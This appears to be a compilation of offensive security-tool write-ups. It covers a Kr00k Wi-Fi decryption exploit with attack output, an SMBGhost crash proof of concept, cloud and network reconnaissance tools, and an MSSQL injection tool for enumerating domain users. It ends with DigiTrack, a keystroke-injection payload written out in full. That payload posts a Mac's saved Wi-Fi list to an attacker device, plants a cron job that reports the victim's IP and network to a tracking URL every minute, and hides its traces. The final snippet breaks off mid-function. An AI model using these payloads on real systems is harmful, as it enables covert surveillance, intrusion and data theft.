"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set number of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output
In order to start an attack, you need to know the BSSID of the access point, its channel, and the MAC address of the victim. You can find them using the airodump-ng wlan0 utility.
Run the exploit:
->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $ $| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0xa649
###[ DNS ]###
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0x104b
###[ DNS ]###
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None
Also, if you have already intercepted traffic (a PCAP file) during the kr00k attack, you can decrypt it:
->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r \n\r\n'

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follo w all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap
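The -p read mode consumes a classic pcap capture like the one above. Iterating over the packets in such a file can be sketched with the Python standard library alone (a minimal parser for illustration only, not the tool's actual implementation):

```python
import struct

def read_pcap(path):
    """Yield raw packet bytes from a classic (non-pcapng) capture file."""
    with open(path, "rb") as f:
        header = f.read(24)                        # global pcap header
        magic = struct.unpack("<I", header[:4])[0]
        endian = "<" if magic == 0xa1b2c3d4 else ">"
        while True:
            rec = f.read(16)                       # per-packet record header
            if len(rec) < 16:
                break
            _sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", rec)
            yield f.read(incl_len)                 # captured packet bytes
```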

Script: traffic_generator.py
This script generates UDP traffic from the victim to demonstrate the kr00k attack.
->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit


CVE-2020-0796 - CVE-2020-0796 Pre-Auth POC


(c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes

POC to check for CVE-2020-0796 / "SMBGhost"
Expected outcome: Blue Screen
Intended only for educational use and testing in corporate environments.
ZecOps takes no responsibility for the code, use at your own risk.
Please contact sales@ZecOps.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.


Usage

CVE-2020-0796-POC.exe [<TargetServer>]

If <TargetServer> is omitted, the POC is executed on localhost (127.0.0.1).


Compiled POC

You can get the compiled POC here.


Compiling

Use Visual Studio to compile the following projects:

  1. ProtoSDK\Asn1Base\Asn1Base.csproj
  2. ProtoSDK\MS-XCA\Xca.csproj
  3. ProtoSDK\MS-SMB2\Smb2.sln

Use the resulting exe file to run the POC.


CVE-2020-0796 - Windows SMBv3 LPE Exploit #SMBGhost


Pulsar - Network Footprint Scanner Platform - Discover Domains And Run Your Custom Checks Periodically


Pulsar is an automated network footprint scanner for Red Teams, Pentesters and Bounty Hunters. It is focused on the discovery of an organization's public-facing assets with minimal knowledge of its infrastructure. Along with network data visualization, it attempts to assign a basic vulnerability score to find infrastructure weak points and their relation to other resources. It can also be used as a custom vulnerability scanner for wide and uncharted scopes. This software was created with availability and openness in mind, so it is 100% free and does not require any API keys to use its features.
This is a beta release; be prepared to notice bugs or even crashes. Help me out and submit an issue.

What it is not?
  • Vulnerability Management Platform
  • Full OSINT framework scanner
  • Speed oriented tool with immediate results
  • Stable enterprise product you can rely on (beta release)

Key features
  • Subdomains discovery
  • Cloud resources discovery
  • Basic vulnerability scanning
  • Scan policies & optimization
  • Data visualization
  • Collaboration & data export
  • Scheduling & notifications
  • REST API
  • External APIs integration
  • OAUTH integration
  • Custom scanner extensions

Future ideas
  • Stability and speed improvements.
  • CLI client
  • More open source integrations.
  • More detailed scan settings.
  • IPv4 subnet discovery.
  • Additional confidence tests.
  • Additional frontend user controls.
  • Harvesting false positive metadata for machine learning model.

Installation instructions
If you would like to use external APIs, see USAGE.md.
In order to use email notifications, edit the EMAIL_BACKEND settings in portal/portal/settings.py before installation.

Windows

Prerequisites
  1. Git-tools
  • Installer is available here.
  2. Docker engine and docker-compose
  • Docker installation instructions are available here.
  • docker-compose installation instructions are available here.
Prerequisites will be verified during the installation process.

Installation
  1. Clone or download latest pulsar repository
git clone https://github.com/pulsar/
  2. Run the PowerShell installer
PS> .\install.ps1
  3. Proceed with the installer instructions
  4. Login to the Pulsar console at https://localhost:8443/ with the generated default credentials

Linux

Prerequisites
  1. Git-tools: install git from your distribution's package manager, e.g.
sudo apt install git
  2. Docker engine and docker-compose
  • Docker installation instructions are available here.
  • Docker-compose installation instructions are available here.
Prerequisites will be verified during the installation process.

Installation
  1. Clone or download latest pulsar repository
git clone https://github.com/pulsar/
  2. Run the bash installer
# ./install.sh
  3. Proceed with the installer instructions
  4. Login to the Pulsar console at https://localhost:8443/ with the generated default credentials

Architecture
Pulsar is a PaaS based on a docker-compose file with pre-installed requirements. The provided architecture can be easily scaled, converted and deployed to multiple common cloud environments. The web application server is based on services such as Nginx, Gunicorn and Django Rest Framework.

Docker container structure

For more information see docker-compose.yml

Contribution

In case of issues
  • Feel free to issue a bug report.
  • See troubleshooting section here.

In case of ideas
  • Feel free to issue a change request.
  • Feel free to issue a pull request.
  • Send me a private message.

In case you would like to see it hosted
  • I'm considering launching a funding campaign.

In case you like the idea
  • Star me and tell your friends!

In case of general criticism about code quality and architecture
  • You don't need to use it.
  • Feel free to issue a pull request.

Documentation

User guide
Basic usage guide can be found here.

REST API
Self describing API is available at /pulsar/api/v1/ endpoint.

Development
Currently the only available documentation is available at /admin/doc/ endpoint.
Full development documentation will be available in future release.


Awspx - A Graph-Based Tool For Visualizing Effective Access And Resource Relationships In AWS Environments





auspex [ˈau̯s.pɛks] noun: An augur of ancient Rome, especially one who interpreted omens derived from the observation of birds.
awspx is a graph-based tool for visualizing effective access and resource relationships within AWS. It resolves policy information to determine what actions affect which resources, while taking into account how these actions may be combined to produce attack paths. Unlike tools like Bloodhound, awspx requires permissions to function. It is not expected to be useful in cases where these privileges have not been granted.

Quick start
Install (see installation), load the sample database, and search for attacks:
awspx db --load-zip sample.zip
awspx attacks
OR run it against an environment of your own (attack information is included by default in this case):
awspx ingest
Browse to localhost and see what you can find!


Installation
awspx requires Docker.
git clone git@github.com:FSecureLABS/awspx.git
cd awspx && ./INSTALL

If it doesn't work out of the box, here are some things to check:
  • The docker container runs a Neo4j database that will forward TCP ports 7687, 7373 and 7474 to these same ports on localhost. If an existing Neo4j installation is present (e.g. BloodHound) awspx will fail. You will need to disable this service before continuing. Alternatively, you can modify network mappings yourself by editing INSTALL.
  • The docker container also forwards to TCP port 80, resulting in similar issues.
  • SELinux may prevent the docker container from doing everything it needs to. If you are running SELinux (props) and encounter issues, check SELinux.
  • Docker makes changes to iptables. You may need to adjust your iptables configuration to get awspx to work.

AWS permissions
The following AWS-managed policies can be used.
  • SecurityAudit will allow you to ingest everything except S3 objects.
  • Add ReadOnlyAccess to also ingest S3 objects (warning: this can be very slow).

Data collection
Once awspx has been installed, you can create a profile by running awspx profile --create my-account, or invoke the ingestor by running awspx ingest on the command line. By default the ingestor will utilise a profile called default unless you specify something else using --profile:
awspx ingest --profile my-other-account
If the profile my-other-account does not exist, you will be prompted to enter an AWS access key ID and secret for it. You will also be prompted for an output format, which you can ignore, and a region, which is not important for IAM but is required for other services. You can also create a profile without ingesting any data by using awspx profile:
awspx profile --create work
Further commands and arguments are provided for tweaking ingestion and attack path computation, and for managing AWS profiles and Neo4j databases. Run awspx -h and awspx {profile|ingest|attacks|db} -h to learn more.
Supported services: IAM, EC2, S3, Lambda

Examples
awspx ingest --profile my-account --services S3
The ingestor will pull only S3 data using the my-account profile and store it in a database named my-account.db. Resource-based policies (and bucket ACLs in this case) will be processed automatically. Identity-based policies will be ignored since IAM has been omitted from this list of services.
awspx ingest --profile my-account --services IAM EC2 --database db-for-ec2
The ingestor will pull only IAM and EC2 data, using the my-account profile, and store it in a database named db-for-ec2.db. Since IAM includes identity-based policies and assume-role policy documents, this information will be included in db-for-ec2.db.
awspx ingest --profile my-account \
--except-types AWS::S3::Object \
--except-arns arn:aws:s3:::broken-bucket arn:aws:ec2:eu-west-1:123456789012:instance/i-1234
awspx will pull data for all supported services using the my-account profile but will not attempt to load S3 objects. It will also skip the bucket named broken-bucket and the EC2 instance named i-1234. A full list of recognised resource types can be found in lib/aws/resources.py.
awspx ingest --profile my-account --skip-attacks
awspx will pull data for all supported services using the my-account profile but will not compute attacks. This can be useful for large environments. Attacks can be computed separately later on by running awspx attacks.
awspx attacks --only-attacks AssumeRole CreateGroup
Using the current database, awspx will compute only the Assume Role and Create Group attacks.
awspx db --load-zip sample.zip
awspx will create a new database named sample from the sample ZIP file. Files must be placed in /opt/awspx/data so that they can be accessed by the docker container. Note that attack information is not included with zip data. To include this information, awspx attacks must be run after a zip has been loaded.
awspx db --use my-other-account
awspx will switch the database to my-other-account. You will need to refresh your browser to see the changes.

Using the frontend
Once you've loaded a database (hint: load the sample data by running awspx db --load-zip sample.zip) you can explore it by visiting localhost in your browser.
To get started, find a Resource (or Action) you're interested in and see where the path takes you (right click on Resources to bring up the context menu, left click to see its properties).

Action colors
Action Effect color palette:
  • Allow: Green edges
  • Deny: Red edges
  • Conditional: Dashed edges
Action Access Type color palette:
  • List: Yellow
  • Read: Pink
  • Write: Indigo
  • Tagging: Teal
  • Permissions Management: Purple
Actions are represented visually using a linear gradient comprised of the Effect and Access colors (in that order). Conditional attacks are presented using a dotted line.

Shortcut keys
Key                 Action
Alt + Enter         Rerun layout
Tab                 Switch between Actions and Resources search view
Ctrl + Drag         Box select
Ctrl + Left Click   Toggle selection
Delete              Remove selected nodes
Escape              Close properties
Ctrl + C            Copy selection properties (JSON)
Ctrl + A            Select all
Ctrl + S            Open search bar

About
awspx was developed by Craig Koorn and David Yates using Python (ingestor), Neo4j (DB), Vue (front-end) and Cytoscape (front-end graph visualization).


MSSQLi-DUET - SQL Injection Script For MSSQL That Extracts Domain Users From An Active Directory Environment Based On RID Bruteforcing


SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.
Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.
Currently it supports only union-based injection. More samples and test cases are required to fully test the tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation where it does not work.
Custom-tailoring the script and plugin to your needs should not be too difficult either. Be sure to read the Notes section for some troubleshooting tips.

Burp Suite Plugin
After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.
The request will populate the request window, and only the fields above it need to be filled out. After hitting Run, the output will be placed in the results output box for easy copy-pasting.

Python Script Usage

Script Help
python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
[-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

optional arguments:
-h, --help show this help message and exit
-i INJECTION, --injection INJECTION
Injection point. Provide only the data needed to
escape the query.
-e ENCODING, --encoding ENCODING
Type of encoding: unicode, doubleencode, unmagicquotes
-t TIME_DELAY, --time_delay TIME_DELAY
Time delay for requests.
-rid RID_RANGE, --rid_range RID_RANGE
Hyphenated range of RIDs to brute force. Ex: 1000-1200
-ssl SSL, --ssl SSL Add flag for HTTPS
-p PARAMETER, --parameter PARAMETER
Vulnerable parameter
-proxy PROXY, --proxy PROXY
Proxy connection string. Ex: 127.0.0.1:8080
-o OUTFILE, --outfile OUTFILE
Outfile for username enumeration results.
-r REQUEST_FILE, --request_file REQUEST_FILE
Raw request file saved from Burp

Prepare to be enumerated!

How to use
After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the 'copy to file' feature.
Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter as well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but the initial injection needs to be specified. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.
Ex: test' 
test'))
test")"

Example
python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[+] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded


[+] Determining the number of columns in the table...
[!] Number of columns is 3
[+] Determining column type...
[!] Column type is null
[+] Discovering domain name...
[+] Domain = NEUTRINO
[+] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-

[+] Enumerating Active Directory via SIDs...

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes
The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.
Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons may need to be commented out to ensure proper determination takes place.
Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.
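The RID bruteforce rests on turning the discovered domain SID plus a candidate RID into the binary SID form that MSSQL's SUSER_SNAME() resolves back to an account name. A standalone sketch of that encoding (an illustration of the technique, not DUET's actual code):

```python
import struct

def sid_to_hex(sid_string, rid=None):
    """Encode 'S-1-5-21-...' (optionally plus a RID) as the 0x... literal
    that can be passed to MSSQL's SUSER_SNAME()."""
    parts = sid_string.split("-")
    authority = int(parts[2])                     # identifier authority, e.g. 5
    subauths = [int(p) for p in parts[3:] if p]   # ignore a trailing dash
    if rid is not None:
        subauths.append(rid)
    blob = struct.pack("<BB", 1, len(subauths))   # revision, subauthority count
    blob += struct.pack(">Q", authority)[2:]      # authority: 6 bytes big-endian
    for sa in subauths:
        blob += struct.pack("<I", sa)             # subauthorities: little-endian
    return "0x" + blob.hex()
```

Looping such literals over a RID range (e.g. 1000-1200) inside the union query is what turns SIDs back into domain account names.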

References
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/


FProbe - Take A List Of Domains/Subdomains And Probe For Working HTTP/HTTPS Server


FProbe - Fast HTTP Probe

Installation
GO111MODULE=on go get -u github.com/theblackturtle/fprobe

Features
  • Take a list of domains/subdomains and probe for working http/https server.
  • Optimize RAM and CPU in runtime.
  • Support special ports for each domain
  • Verbose in JSON format with some additional headers, such as Status Code, Content Type, Location.

Usage
Usage of fprobe:
-c int
Concurrency (default 50)
-i string
Input file (default is stdin) (default "-")
-l Use ports in the same line (google.com,2087,2086)
-p value
add additional probe (proto:port)
-s skip the default probes (http:80 and https:443)
-t int
Timeout (seconds) (default 9)
-v Turn on verbose

Basic Usage
Stdin input
❯ cat domains.txt | fprobe
File input
❯ fprobe -i domains.txt

Concurrency
❯ cat domains.txt | fprobe -c 200

Use inline ports
If you want to use special ports for each domain, you can use the -l flag. You can parse Nmap/Masscan output and reformat it to use this feature.
Input (domains.txt)
google.com,2087,2086,8880,2082,443,80,2052,2096,2083,8080,8443,2095,2053
yahoo.com,2087,2086,8880,2082,443,80,2052,2096,2083,8080,8443,2095,2053
sport.yahoo.com,2086,443,2096,2053,8080,2082,80,2083,8443,2052,2087,2095,8880
Command
❯ cat domains.txt | fprobe -l
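If your port list comes from Nmap, reshaping grepable (-oG) output into the host,port,port lines shown above takes only a few lines; a hypothetical helper, not part of fprobe:

```python
import re
from collections import OrderedDict

def gnmap_to_fprobe(gnmap_text):
    """Convert `nmap -oG` output into 'host,port,port' lines for fprobe -l."""
    hosts = OrderedDict()
    for line in gnmap_text.splitlines():
        m = re.search(r"Host: (\S+).*Ports: (.+)", line)
        if not m:
            continue
        host, ports = m.group(1), m.group(2)
        # keep only open ports; each entry looks like '80/open/tcp//http///'
        opened = [p.strip().split("/")[0] for p in ports.split(",") if "/open/" in p]
        hosts.setdefault(host, []).extend(opened)
    return "\n".join("%s,%s" % (h, ",".join(ps)) for h, ps in hosts.items() if ps)
```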

Timeout
❯ cat domains.txt | fprobe -t 10

Special ports
❯ cat domains.txt | fprobe -p http:8080 -p https:8443

Use to check working urls
❯ echo 'https://google.com/path1?param=1' | fprobe

https://google.com/path1?param=1

Use the built-in ports collection (Include 80, 443 by default)
  • Medium: 8000, 8080, 8443
  • Large: 81, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888
  • XLarge: 81, 300, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 12443, 16080, 18091, 18092, 20720, 28017
❯ cat domains.txt | fprobe -p medium/large/xlarge

Skip default probes
If you don't want to probe for HTTP on port 80 or HTTPS on port 443, you can use the -s flag.
❯ cat domains.txt | fprobe -s

Verbose
The verbose output is formatted as JSON with some additional fields, such as Status Code, Content Type and Location.
❯ cat domains.txt | fprobe -v
{"site":"http://google.com","status_code":301,"server":"gws","content_type":"text/html; charset=UTF-8","location":"http://www.google.com/"}
{"site":"https://google.com","status_code":301,"server":"gws","content_type":"text/html; charset=UTF-8","location":"https://www.google.com/"}
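Because each verbose line is a standalone JSON object, post-processing is straightforward; for example, pulling out redirect targets (field names as in the sample output above):

```python
import json

def redirects(verbose_lines):
    """Yield (site, location) pairs for 3xx responses from fprobe -v output."""
    for line in verbose_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if 300 <= rec.get("status_code", 0) < 400:
            yield rec["site"], rec["location"]
```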

Credit
This tool takes its idea and some lines of code from httprobe, written by @tomnomnom.



DigiTrack - Attacks For $5 Or Less Using Arduino


In 30 seconds, this attack can learn which networks a macOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds.

Now includes: Hardtracker - Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple things:
  1. Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim's data connection at any time when you are in Wi-Fi range.
  2. Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connections)
  3. Inserts a tracking job that sends the IP address and currently connected network to a Grabify link every 60 seconds.

The attack goes like this: a victim leaves a macOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single keystrokes removed):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
  • We add the network "Sneakernet" to our trusted network list and connect to it.

DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H \"Content-Type: text/plain\" --data \"$(networksetup -listpreferredwirelessnetworks en0)\" 192.168.4.1 &");
  • After connecting, we send a curl request listing every single network the macOS computer has connected to in the past to the esp8266 serving the "Sneakernet" network. The & puts the process in the background, and -m caps the request at 10 seconds so it cannot hang. Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.

DigiKeyboard.print("export VISUAL=nano; crontab -e");
  • We create a job that will execute every 60 seconds

DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer \"$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')\" https://grabi/YOURLINK");
  • We suppress the output of CURL, and grab the network name of the currently connected Wi-Fi network. We sent this along with a CURL request to a tracking URL, delivering the target's IP address and currently connected Wi-Fi network every 60 seconds.

DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");
  • Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.
Total run time is about 30 seconds, not including the few seconds the DigiSpark waits for the sketch to upload.
Notes: Grabify may go into "I'm under attack" mode and refuse the check-in. Look for this line: div class="cf-browser-verification cf-im-under-attack"
If you see it, the IP address is being blocked by Cloudflare.
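That marker check is easy to automate; a minimal Python sketch, assuming you have already fetched the page HTML yourself (the function name is made up for illustration):

```python
def is_cloudflare_challenge(html):
    """Return True if the page looks like Cloudflare's 'I'm Under Attack' interstitial."""
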